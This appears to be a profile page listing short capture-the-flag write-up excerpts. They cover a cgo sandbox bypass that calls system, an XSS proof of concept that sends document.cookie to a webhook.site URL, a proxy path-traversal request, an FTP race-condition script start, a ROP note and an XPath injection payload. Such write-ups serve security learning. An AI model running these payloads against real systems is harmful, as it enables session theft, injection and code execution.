sqrtrev

@sqrtrev

Joined on Aug 23, 2022

  • gotojail Noticed that we can use cgo. Bypassed the (){} blacklist by using asm() to spoof the free function and a gadget in #<netipx/ipx.h> package main //#include <netipx/ipx.h> //#define SIOCPROTOPRIVATE"free:movq $0x6873,\050%rdi);jmp system;.globl free;" //__asm__ SIOCAIPXITFCRT; import "C" func main(){}
  • Web Blink We clobbered the body property with a frame (<iframe name=body>) and then the togglePopover property with an anchor tag <a id=togglePopver >. Then setInterval will receive our anchor tag as its first argument and will call toString on it, which will turn it into our payload and then execute it. poc: <script> window.open(`http://web:3000/#%3Ciframe%20srcdoc=%22%3Ca%20href='tel:/df/;eval(window.name)'%20id=togglePopover%20%3E%3C/a%3E%22%20name=body%3E%3C/iframe%3E`,'fetch("https://webhook.site/f038dd80-dd62-45a4-8928-696a140f8b12?a="+document.cookie);') </script> eeejs
  • Team Super Guesser Web flagstore The proxy handling part in Node.js uses url.parse once. Because of this it drops anything after #. If we put %23 anywhere in the URL, anything after that will not be sent to nginx. This allows us to bypass the /api/_ restriction. curl http://flagstore.sstf.site:8000/api/order/%2e%2e/_secret/keys%23/%2e%2e/%2e%2e/%2e%2e/api/
  • chatUWU nonheavyftp There is a race condition in the application. While the other thread is waiting for a connection, we can change the path with the USER command. from pwn import * p = remote('47.89.253.219',2121); p.send(b'USER anonymous\r\n') p.recvline() p.send(b'PASS df\r\n')
  • by Super Guesser Pwnable koncha A simple stack BOF challenge. There is a libc-related value on the stack (specifically, at the same address as name). Just send a blank line and we can get a libc leak. After that we can build a ROP chain. #!/usr/bin/env python3
  • Web Yet Another Injection We can get the source code from the hint array_push($users, "guest:".hash("sha256", "guest")); in login.php, so we can log in as guest. In index.php, the JavaScript has show_detail(). show_detail() can read XML data and we can do XPath injection: show_detail("-1' or @published='no' or Idx/text()='-1");